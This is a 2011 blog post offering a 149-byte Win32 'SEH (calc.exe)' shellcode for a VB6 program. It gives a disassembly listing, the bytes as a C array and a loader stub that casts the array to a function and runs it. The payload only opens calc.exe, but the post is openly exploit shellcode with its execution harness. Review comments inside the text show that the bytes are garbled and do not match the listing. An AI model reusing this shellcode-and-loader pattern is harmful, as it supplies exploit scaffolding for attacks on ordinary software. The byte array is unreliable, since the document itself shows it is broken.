
Tuesday, August 09, 2011

VB6_vbaExceptHandler - SEH (calc.exe) ShellCode

# =========[ Sh31LC0d3.C ]=====>

/*

###

# Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes

# Author : KedAns-Dz

# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com

# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)

# Twitter page : twitter.com/kedans

# platform : Win32

# Target : VB6 ExE Project >*> Command : Shell ("calc.exe")

# Tested on : Windows XP SP3 France

###

*/

// TesT Project >> Compile As Name k3d4n5.exe <<

/*

004018E0 > 55 | PUSH EBP

004018E1 . 8BEC | MOV EBP,ESP

004018E3 . 83EC 0C | SUB ESP,0C

004018E6 . 68 96104000 | PUSH <JMP.&MSVBVM60.__vbaExceptHandler> ; SE handler installation (SEH)

004018EB . 64:A1 00000000 | MOV EAX,DWORD PTR FS:[0]

004018F1 . 50 | PUSH EAX

004018F2 . 64:8925 00000000 | MOV DWORD PTR FS:[0],ESP

004018F9 . 83EC 30 | SUB ESP,30

004018FC . 53 | PUSH EBX

004018FD . 56 | PUSH ESI

004018FE . 57 | PUSH EDI

004018FF . 8965 F4 | MOV DWORD PTR SS:[EBP-C],ESP

00401902 . C745 F8 80104000 | MOV DWORD PTR SS:[EBP-8],k3d4n5.00401080

00401909 . 8B45 08 | MOV EAX,DWORD PTR SS:[EBP+8]

0040190C . 8BC8 | MOV ECX,EAX

0040190E . 83E1 01 | AND ECX,1

00401911 . 894D FC | MOV DWORD PTR SS:[EBP-4],ECX

00401914 . 24 FE | AND AL,0FE

00401916 . 50 | PUSH EAX

00401917 . 8945 08 | MOV DWORD PTR SS:[EBP+8],EAX

0040191A . 8B10 | MOV EDX,DWORD PTR DS:[EAX]

0040191C . FF52 04 | CALL DWORD PTR DS:[EDX+4]

0040191F . 33F6 | XOR ESI,ESI

00401921 . 8D55 CC | LEA EDX,DWORD PTR SS:[EBP-34]

00401924 . 8975 CC | MOV DWORD PTR SS:[EBP-34],ESI

00401927 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]

0040192A . 8975 DC | MOV DWORD PTR SS:[EBP-24],ESI

0040192D . C745 D4 616C632E657865 | MOV DWORD PTR SS:[EBP-2C], calc.exe

00401934 . C745 CC 08000000 | MOV DWORD PTR SS:[EBP-34],8

0040193B . FF15 68104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarDup>] ; MSVBVM60.__vbaVarDup

00401941 . 8D45 DC | LEA EAX,DWORD PTR SS:[EBP-24]

00401944 . 6A 02 | PUSH 2

00401946 . 50 | PUSH EAX

00401947 . FF15 34104000 | CALL DWORD PTR DS:[<&MSVBVM60.#600>] ; MSVBVM60.rtcShell

0040194D . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]

00401950 . DDD8 | FSTP ST

00401952 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar

00401958 . 8975 FC | MOV DWORD PTR SS:[EBP-4],ESI

0040195B . 9B | WAIT

0040195C . 68 6E194000 | PUSH k3d4n5.0040196E

00401961 . EB 0A | JMP SHORT k3d4n5.0040196D

00401963 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]

00401966 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar

0040196C . C3 | RETN

*/

/*
 * Byte dump of the disassembly above (the VB6 test project's routine that
 * reaches MSVBVM60.rtcShell), kept as a C string literal.
 *
 * Review notes for anyone triaging this sample:
 *  - sizeof SEH is 149: 148 code bytes plus the literal's terminating NUL,
 *    which is where the "149 Bytes" in the title comes from.  strlen() is
 *    not usable for the length because the 11th byte is an embedded \x00.
 *  - The bytes are not position-independent.  The PUSH of the
 *    __vbaExceptHandler thunk (\x68\x96\x10\x40\x00), the MOV of 00401080
 *    and every CALL DWORD PTR [xx104000] go through fixed addresses / IAT
 *    slots of the k3d4n5.exe image, so they are only meaningful inside that
 *    specific binary, never as a standalone payload.
 *  - The array does not match the listing byte-for-byte (listing spans
 *    141 bytes, array holds 148): four extra bytes \x00\x40\x18\xF9 follow
 *    the FS:[0] store (they spell the listing address 004018F9, apparently
 *    pasted in); after \xC7\x45\xD4 the seven ASCII bytes "alc.exe" stand
 *    where a 4-byte immediate belongs; the rtcShell call is \xFF\x15\x34
 *    \x10\x00 with the \x40 dropped; and the PUSH before JMP SHORT is
 *    \x68\x41\x42\x43\x40\x44 rather than the listed 68 6E194000.
 *    Treat it as a documentation artefact, not a working sample.
 *  - NOTE(review): "Tested on Windows XP SP3" refers to the VB6 project
 *    itself; nothing on this page shows this array executing.
 */
char SEH[] =

"\x55\x8B\xEC\x83\xEC\x0C\x68\x96\x10\x40\x00\x64\xA1\x00\x00\x00\x00\x50\x64" /* 004018E0..004018F1: prologue, SEH frame install */

"\x89\x25\x00\x00\x00\x00\x00\x40\x18\xF9\x83\xEC\x30\x53\x56\x57\x89\x65\xF4" /* \x00\x40\x18\xF9 is not in the listing */

"\xC7\x45\xF8\x80\x10\x40\x00\x8B\x45\x08\x8B\xC8\x83\xE1\x01\x89\x4D\xFC\x24"

"\xFE\x50\x89\x45\x08\x8B\x10\xFF\x52\x04\x33\xF6\x8D\x55\xCC\x89\x75\xCC\x8D"

"\x4D\xDC\x89\x75\xDC\xC7\x45\xD4\x61\x6C\x63\x2E\x65\x78\x65\xC7\x45\xCC\x08" /* "alc.exe" as raw ASCII, 7 bytes where the listing has 4 */

"\x00\x00\x00\xFF\x15\x68\x10\x40\x00\x8D\x45\xDC\x6A\x02\x50\xFF\x15\x34\x10" /* __vbaVarDup, then rtcShell call (truncated, see header) */

"\x00\x8D\x4D\xDC\xDD\xD8\xFF\x15\x08\x10\x40\x00\x89\x75\xFC\x9B\x68\x41\x42" /* __vbaFreeVar; PUSH immediate differs from listing */

"\x43\x40\x44\xEB\x0A\x8D\x4D\xDC\xFF\x15\x08\x10\x40\x00\xC3"; /* JMP SHORT, __vbaFreeVar, RETN */



/*
 * Loader stub: reinterprets the SEH[] byte array as a function and calls it.
 *
 * NOTE(review): converting a data pointer to a function pointer and calling
 * it is undefined behaviour in C, and SEH lives in a writable data section,
 * so on any process where DEP/NX covers this executable the call faults
 * before the first byte runs.  Even where it does not, the bytes reference
 * absolute addresses of the k3d4n5.exe image (see the comment on SEH), so
 * nothing meaningful can execute from this host process.  argc/argv are
 * unused, the (int) cast does nothing (the call's result is discarded), and
 * main relies on C99's implicit return 0.
 */
int main(int argc, char **argv)

{

int (*shellcode)();

shellcode = (int (*)()) SEH; /* data pointer -> function pointer: UB */

(int)(*shellcode)(); /* return value discarded */

}

/*
